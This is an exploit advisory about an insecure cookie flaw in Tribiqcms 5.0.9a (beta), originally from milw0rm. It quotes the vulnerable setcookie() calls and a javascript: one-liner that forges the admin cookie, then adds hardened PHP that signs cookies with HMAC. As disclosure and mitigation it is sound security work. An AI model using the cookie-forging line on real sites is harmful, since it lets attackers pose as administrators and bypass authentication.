Tribiqcms 5.0.9a (beta) Insecure Cookie Handling Vulnerability
Discovered By: ZoRLu
code:
setcookie ("COOKIE_LAST_ADMIN_USER", $newAdmin["username"], time()+8640000, '/');
setcookie ("COOKIE_LAST_ADMIN_LANG", $newAdmin["use_language_id"], time()+8640000, '/');
Exploit:
javascript:document.cookie = "COOKIE_LAST_ADMIN_USER=real_admin_name; path=/"; document.cookie = "COOKIE_LAST_ADMIN_LANG=en-GB; path=/";
example for my localhost:
javascript:document.cookie = "COOKIE_LAST_ADMIN_USER=zorlu; path=/"; document.cookie = "COOKIE_LAST_ADMIN_LANG=en-GB; path=/";
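The two setcookie() calls above store the admin name as a plain value that any browser can overwrite, which is what the exploit lines do. A hardened form follows as an added example, not Tribiq's code or the advisory author's: it assumes the application reads these cookies back on later requests, and the secret constant, helper names and cookie layout are hypothetical.

```php
<?php
// Added example. COOKIE_SECRET, seal_cookie_value(), open_cookie_value() and
// remember_admin_user() are hypothetical names, not part of Tribiq CMS.
const COOKIE_SECRET = 'REPLACE_WITH_RANDOM_SERVER_SIDE_KEY'; // placeholder key

// Build "base64(value)|expiry|hmac" so any client-side edit breaks the MAC.
function seal_cookie_value(string $value, int $expires): string
{
    $payload = base64_encode($value) . '|' . $expires;
    return $payload . '|' . hash_hmac('sha256', $payload, COOKIE_SECRET);
}

// Return the stored value, or null when the cookie is unsigned, altered or expired.
function open_cookie_value(string $cookie, int $now): ?string
{
    $parts = explode('|', $cookie);
    if (count($parts) !== 3) {
        return null;
    }
    [$b64, $expires, $mac] = $parts;
    $expected = hash_hmac('sha256', $b64 . '|' . $expires, COOKIE_SECRET);
    if (!hash_equals($expected, $mac)) {   // constant-time comparison
        return null;
    }
    if (!ctype_digit($expires) || (int) $expires < $now) {
        return null;
    }
    $value = base64_decode($b64, true);
    return $value === false ? null : $value;
}

// Replacement for the first setcookie() call: sealed value, HttpOnly, SameSite.
function remember_admin_user(string $username): bool
{
    $expires = time() + 8640000;
    return setcookie('COOKIE_LAST_ADMIN_USER', seal_cookie_value($username, $expires),
        ['expires' => $expires, 'path' => '/', 'httponly' => true, 'samesite' => 'Strict']);
}

// Constructed inputs: a sealed cookie, the bare value from the exploit line,
// and a sealed cookie whose name part was swapped after signing.
$now = time();
$sealed = seal_cookie_value('zorlu', $now + 8640000);
$swapped = base64_encode('real_admin_name') . substr($sealed, strpos($sealed, '|'));
foreach ([$sealed, 'zorlu', $swapped] as $candidate) {
    var_dump(open_cookie_value($candidate, $now));
}
```

A sealed cookie only proves the server issued the value; the admin check itself still belongs in a server-side session, with the cookie used for nothing more than remembering the last username.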
Source: http://www.milw0rm.com/exploits/6886
Friday, 31 October 2008